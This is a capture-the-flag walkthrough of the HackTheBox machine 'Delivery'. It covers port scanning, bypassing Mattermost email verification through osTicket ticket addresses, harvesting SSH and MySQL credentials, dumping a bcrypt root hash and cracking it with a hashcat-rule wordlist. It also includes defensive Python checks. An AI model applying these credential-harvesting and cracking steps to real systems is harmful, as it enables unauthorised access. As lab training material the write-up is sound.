TL;DR
This is a walkthrough writeup on Delivery, a Linux box rated easy on HackTheBox and created by our messiah Ippsec. The box runs Mattermost and osTicket. The initial foothold was gained by impersonating an internal email address to read the Mattermost server chat, which revealed the SSH credentials. Privilege escalation required us to enumerate the box to find the root password hash and use a hashcat rule-based attack to crack it.
Delivery Writeup: Scanning Network
Running the usual Nmap port scan:
Command used: nmap -sC -sV -A -v -n -Pn -oN nmap.initial 10.10.10.222
Nmap scan report for 10.10.10.222
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
| 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_ 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: Welcome
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
8065/tcp open unknown
| fingerprint-strings:
| GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Accept-Ranges: bytes
| Cache-Control: no-cache, max-age=31556926, public
| Content-Length: 3108
| Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
| Content-Type: text/html; charset=utf-8
| Last-Modified: Thu, 09 Dec 2021 06:47:37 GMT
| X-Frame-Options: SAMEORIGIN
| X-Request-Id: p1pj5pjd4if63xr8umufmyhxse
| X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
| Date: Thu, 09 Dec 2021 07:09:06 GMT
| <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Date: Thu, 09 Dec 2021 07:09:07 GMT
|_ Content-Length: 0
We got 3 ports to deal with:
port 22 : SSH
port 80 : web server
port 8065 : unknown (the fingerprinted response is a Mattermost page)
Website Enumeration
Port 80
We went ahead and visited port 80 in our browser:
Okay, so from this message it seems that a Mattermost server is running on the box, and only a user with a @delivery.htb email address has access to Delivery's Mattermost server.
We also found an external link going to helpdesk.delivery.htb. So I edited the /etc/hosts file and added the following entry, so that our local machine resolves this domain:
10.10.10.222 helpdesk.delivery.htb
We have a service called osTicket running on helpdesk.delivery.htb.
What is osTicket? osTicket is a widely used and trusted open source support ticketing system that easily scales and streamlines your customer service and drastically improves your customer's experience. It seamlessly integrates inquiries created via email, phone and web-based forms into a simple, easy-to-use multi-user web interface. You can read more about it here.
We will come back to this later.
Port 8065
We have a Mattermost server running on this port.
What is Mattermost? Mattermost is an open-source, self-hostable online chat service with file sharing, search, and integrations. It is designed as an internal chat for organisations and companies, and mostly markets itself as an open-source alternative to Slack and Microsoft Teams. You can read more about it here.
We can create a new account here, but it will send an email verification link, and we can't use third-party email providers like Gmail, because the machine is in HTB's internal network and it won't be able to send anything outside that network.
Also, recall the message we got earlier (in the “contact us” panel): only a user with a @delivery.htb email address can access the Mattermost server for Delivery.
So we need to somehow get access to a @delivery.htb email address.
Enumerating the osTicket Service
I filled in the details and opened a new ticket.
We are given a confirmation that a new ticket has been opened.
It also tells us that if we want to add more information to our ticket, we can email it to <ticket_number>@delivery.htb.
Obviously we can sense some potential here.
Checking the Ticket Status
On checking the ticket status we can see the information that we provided in the ticket.
Initial Foothold (email impersonation)
According to the message given earlier, we can add information to our ticket by sending an email to <ticket_num>@delivery.htb. So we can use this email address, <ticket_num>@delivery.htb, in the Mattermost signup process; the verification email will be sent to it and added to the ticket information, which we can view in the ticket status section.
Signing up on Mattermost with the above email :
Viewing the “email verification link” added in the ticket information :
After completing the email verification process by visiting the verification link, we can access the “Internal” channel on the Mattermost server.
There’s a lot of juicy information in the chat here :
Credentials to the server ->
user : maildeliverer
pass : Youve_G0t_Mail!
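The trust boundary the foothold crosses is worth spelling out: Mattermost trusted any address at @delivery.htb, while osTicket hands out <ticket_number>@delivery.htb addresses whose inbound mail is displayed on a ticket page that anyone holding the ticket can read. The check below is an added example (not code from the box, Mattermost or osTicket) of a signup policy that refuses to auto-trust ticket-style and role mailboxes even on the internal domain; the local-part patterns and the sample ticket number are assumptions.

```python
import re
from typing import Tuple

# Domain Delivery's Mattermost treats as internal (from the writeup).
TRUSTED_DOMAIN = "delivery.htb"

# Local parts that are NOT one person's private mailbox. The all-digits
# pattern models osTicket's <ticket_number>@delivery.htb reply addresses,
# whose inbound mail is shown on the ticket-status page; the rest are
# common role accounts. Both are assumptions, not osTicket settings.
PUBLIC_INBOX_PATTERNS = [
    re.compile(r"^\d+$"),
    re.compile(r"^(?:no-?reply|support|helpdesk|tickets?|postmaster)$"),
]

def classify_signup_email(address: str) -> Tuple[bool, str]:
    """Return (trusted, reason) for a self-service signup address.

    A domain match alone is what Delivery relied on; this also requires
    the mailbox to be private to one person before auto-granting access.
    """
    addr = address.strip().lower()
    if addr.count("@") != 1:
        return False, "malformed address"
    local, domain = addr.split("@")
    if domain != TRUSTED_DOMAIN:
        return False, f"domain {domain!r} is not {TRUSTED_DOMAIN!r}"
    # Strip a '+tag' so 1234567+x@... cannot sidestep the pattern check.
    base_local = local.split("+", 1)[0]
    for pattern in PUBLIC_INBOX_PATTERNS:
        if pattern.match(base_local):
            return False, f"{local!r} looks like a shared or automated inbox"
    return True, "personal mailbox on the trusted domain"

if __name__ == "__main__":
    # Constructed sample addresses; 9442276 is a made-up ticket number.
    for a in ("alice@delivery.htb", "9442276@delivery.htb", "alice@gmail.com"):
        print(a, classify_signup_email(a))
```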
Delivery Writeup: User Flag
SSH into the box using the obtained credentials :
┌─[root@kali]─[/opt/jd-gui]
└──╼ ssh maildeliverer@10.10.10.222
maildeliverer@10.10.10.222's password:
Last login: Thu Nov 24 08:12:11 2021 from 10.10.14.4
maildeliverer@Delivery:~$ whoami
maildeliverer
maildeliverer@Delivery:~$ cat user.txt
4twqf****************************
Delivery Writeup: Privilege Escalation
During system enumeration, we found this config file for Mattermost:
maildeliverer@Delivery:/$ cat /opt/mattermost//config/config.json
It revealed the MySQL database credentials:
"SqlSettings": {
"DriverName": "mysql",
"DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
"DataSourceReplicas": [],
"DataSourceSearchReplicas": [],
"MaxIdleConns": 20,
"ConnMaxLifetimeMilliseconds": 3600000,
"MaxOpenConns": 300,
"Trace": false,
"AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
"QueryTimeout": 30,
"DisableDatabaseSearch": false
},
MySQL credentials
Database : mysql
user : mmuser
pass : Crack_The_MM_Admin_PW
We can see the obvious hint given by the password: we need to find the password hash for the root user in the database and crack it.
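The cleartext DSN in config.json, readable by a low-privileged account, is what makes this step possible. As an added example (not part of the box or Mattermost), the Python below parses the SqlSettings.DataSource DSN and flags both the embedded password and overly broad file permissions; the sample config is constructed to mirror the block above and the audit logic is my own, not a Mattermost tool.

```python
import json
import os
import re
import stat
import tempfile
from typing import Dict, List

# DSN shape Mattermost uses in SqlSettings.DataSource (Go MySQL driver):
#   user:password@tcp(host:port)/dbname?params
DSN_RE = re.compile(r"^(?P<user>[^:@]+):(?P<password>[^@]*)@"
                    r"(?P<proto>\w+)\((?P<addr>[^)]*)\)/(?P<db>[^?]*)(?:\?.*)?$")

SAMPLE_CONFIG = {  # constructed; mirrors the SqlSettings block quoted above
    "SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost"
                      "?charset=utf8mb4,utf8&readTimeout=30s&writeTimeout=30s",
    }
}

def parse_mysql_dsn(dsn: str) -> Dict[str, str]:
    """Split a DSN into user/password/proto/addr/db; raise if it does not match."""
    m = DSN_RE.match(dsn)
    if not m:
        raise ValueError("unrecognised DSN format")
    return m.groupdict()

def audit_mattermost_config(path: str) -> List[str]:
    """Return findings for a Mattermost config.json; an empty list means clean."""
    findings = []
    mode = os.stat(path).st_mode
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(f"{path} is readable by group/other ({stat.filemode(mode)})")
    with open(path) as f:
        cfg = json.load(f)
    dsn = cfg.get("SqlSettings", {}).get("DataSource", "")
    p = parse_mysql_dsn(dsn) if dsn else {}
    if p.get("password"):
        findings.append(f"DataSource embeds a cleartext password for {p['user']!r} "
                        f"on {p['addr']} (db {p['db']!r})")
    return findings

def write_sample_config(mode: int = 0o644) -> str:
    """Write SAMPLE_CONFIG into a fresh temp dir with the given mode; return its path."""
    path = os.path.join(tempfile.mkdtemp(), "config.json")
    with open(path, "w") as f:
        json.dump(SAMPLE_CONFIG, f)
    os.chmod(path, mode)
    return path
```

Running audit_mattermost_config(write_sample_config()) reports both findings; with mode 0o600 only the embedded password remains, which is the part a secrets manager or environment-injected DSN would remove.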
So, I went ahead and tried to connect to the MySQL database:
maildeliverer@Delivery:/opt/mattermost/config$ mysql -u mmuser -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 91
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mattermost |
+--------------------+
2 rows in set (0.001 sec)
MariaDB [(none)]> use mattermost;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [mattermost]> show tables;
+------------------------+
| Tables_in_mattermost |
+------------------------+
| Audits |
| Bots |
| ChannelMemberHistory |
| ChannelMembers |
| Channels |
| ClusterDiscovery |
| CommandWebhooks |
| Commands |
| Compliances |
| Emoji |
| FileInfo |
| GroupChannels |
| GroupMembers |
| GroupTeams |
| IncomingWebhooks |
| Jobs |
| Licenses |
| LinkMetadata |
| OAuthAccessData |
| OAuthApps |
| OAuthAuthData |
| OutgoingWebhooks |
| PluginKeyValueStore |
| Posts |
| Preferences |
| ProductNoticeViewState |
| PublicChannels |
| Reactions |
| Roles |
| Schemes |
| Sessions |
| SidebarCategories |
| SidebarChannels |
| Status |
| Systems |
| TeamMembers |
| Teams |
| TermsOfService |
| ThreadMemberships |
| Threads |
| Tokens |
| UploadSessions |
| UserAccessTokens |
| UserGroups |
| UserTermsOfService |
| Users |
+------------------------+
46 rows in set (0.001 sec)
MariaDB [mattermost]> select * from Users;
-----------SNIP-------------------
0 | root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | NULL |
| root@delivery.htb | 1 | | | | | system_admin system_user | 1 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609157893370 | 0 |
-----------SNIP-------------------
----- Writing a query to get a readable output -----
MariaDB [mattermost]> select username,password,email,roles from Users where username='root';
+----------+--------------------------------------------------------------+-------------------+--------------------------+
| username | password | email | roles |
+----------+--------------------------------------------------------------+-------------------+--------------------------+
| root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | root@delivery.htb | system_admin system_user |
+----------+--------------------------------------------------------------+-------------------+--------------------------+
1 row in set (0.001 sec)
We found root’s password hash:
root hash
root : $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO
Instead of rushing straight to hashcat or John the Ripper, let's look back and recall the message we got in the Mattermost server chat about cracking the hashes of passwords like PleaseSubscribe! by using hashcat rules.
We can generate a wordlist containing different variations of the word PleaseSubscribe! using hashcat rules. It will be a very small wordlist.
What is a hashcat rule-based attack? The rule-based attack is like a programming language designed for password candidate generation. It has functions to modify, cut or extend words and has conditional operators to skip some, etc. That makes it the most flexible, accurate and efficient attack. You can read more about it here.
You can check all available hashcat rules in /usr/share/hashcat/rules/. We will be using the best64 rule in our case to generate the wordlist.
┌──(root㉿kali)-[~/Desktop/Boxes/HTB/Delivery]
└─# echo PleaseSubscribe! | hashcat -r /usr/share/hashcat/rules/best64.rule --stdout > wordlist.txt
┌──(root㉿kali)-[~/Desktop/Boxes/HTB/Delivery]
└─# wc -l wordlist.txt
77 wordlist.txt
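To see what best64 actually does to the base word, here is an added example (my own code, not hashcat's) implementing a subset of hashcat's rule functions; the best64 line `$2 $1` is what turns PleaseSubscribe! into PleaseSubscribe!21, which is the lesson of this box: a shared base word plus a short suffix is one rule away from the original. Positions use hashcat's 0-9/A-Z encoding and only the functions listed in the code are supported.

```python
from typing import Dict, List

def _pos(ch: str) -> int:
    """hashcat positions: 0-9, then A-Z for 10-35."""
    return int(ch, 36)

def apply_function(word: str, fn: str) -> str:
    """Apply one hashcat rule function (a subset of the full rule language)."""
    op, arg = fn[0], fn[1:]
    if op == ":": return word                       # no-op (base word itself)
    if op == "l": return word.lower()
    if op == "u": return word.upper()
    if op == "c": return word[:1].upper() + word[1:].lower()
    if op == "t": return word.swapcase()            # toggle case of every char
    if op == "r": return word[::-1]                 # reverse
    if op == "d": return word * 2                   # duplicate
    if op == "f": return word + word[::-1]          # reflect
    if op == "[": return word[1:]                   # delete first char
    if op == "]": return word[:-1]                  # delete last char
    if op == "{": return word[1:] + word[:1]        # rotate left
    if op == "}": return word[-1:] + word[:-1]      # rotate right
    if op == "$": return word + arg                 # $X: append X
    if op == "^": return arg + word                 # ^X: prepend X
    if op == "s": return word.replace(arg[0], arg[1])   # sXY: replace X with Y
    if op in "TDoi":                                # functions taking a position
        n = _pos(arg[0])
        if op == "T": return word[:n] + word[n:n + 1].swapcase() + word[n + 1:]
        if op == "D": return word[:n] + word[n + 1:]
        if op == "o": return word[:n] + arg[1] + word[n + 1:]   # oNX: overwrite
        return word[:n] + arg[1] + word[n:]         # iNX: insert X at N
    raise ValueError(f"unsupported rule function {fn!r}")

def apply_rule(word: str, rule: str) -> str:
    """A rule line is whitespace-separated functions applied left to right."""
    for fn in rule.split():
        word = apply_function(word, fn)
    return word

def expand(word: str, rules: List[str]) -> List[str]:
    """Candidate list for one base word, deduplicated, order preserved."""
    seen: Dict[str, None] = {}
    for rule in rules:
        if rule.strip() and not rule.lstrip().startswith("#"):
            seen.setdefault(apply_rule(word, rule), None)
    return list(seen)
```

Feeding expand() the lines of best64.rule reproduces the 77-candidate wordlist above for the functions it supports, which is why a password policy that forbids the base word but not its suffix variants buys nothing.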
Now, using John the Ripper to crack the hash with the help of the wordlist that we just created.
┌──(root㉿kali)-[~/Desktop/Boxes/HTB/Delivery]
└─# john hash.txt --wordlist=wordlist.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
PleaseSubscribe!21 (?)
1g 0:00:00:00 DONE (2021-12-09 05:40) 2.702g/s 97.29p/s 97.29c/s 97.29C/s PleaseSubscribe!..PleaseSubscrio
Use the "--show" option to display all of the cracked passwords reliably
Session completed
We have successfully cracked the password hash for root.
user : root
pass : PleaseSubscribe!21
All we need to do now is switch to the root user using the su root command.
Delivery Writeup: Root Flag
maildeliverer@Delivery:/opt/mattermost/config$ su root
Password:
root@Delivery:/opt/mattermost/config# id
uid=0(root) gid=0(root) groups=0(root)
root@Delivery:/opt/mattermost/config# cat /root/root.txt
2dbd****************************
Kudos for successfully rooting Delivery.
Until next time, do check out other informative writeups and blogs here.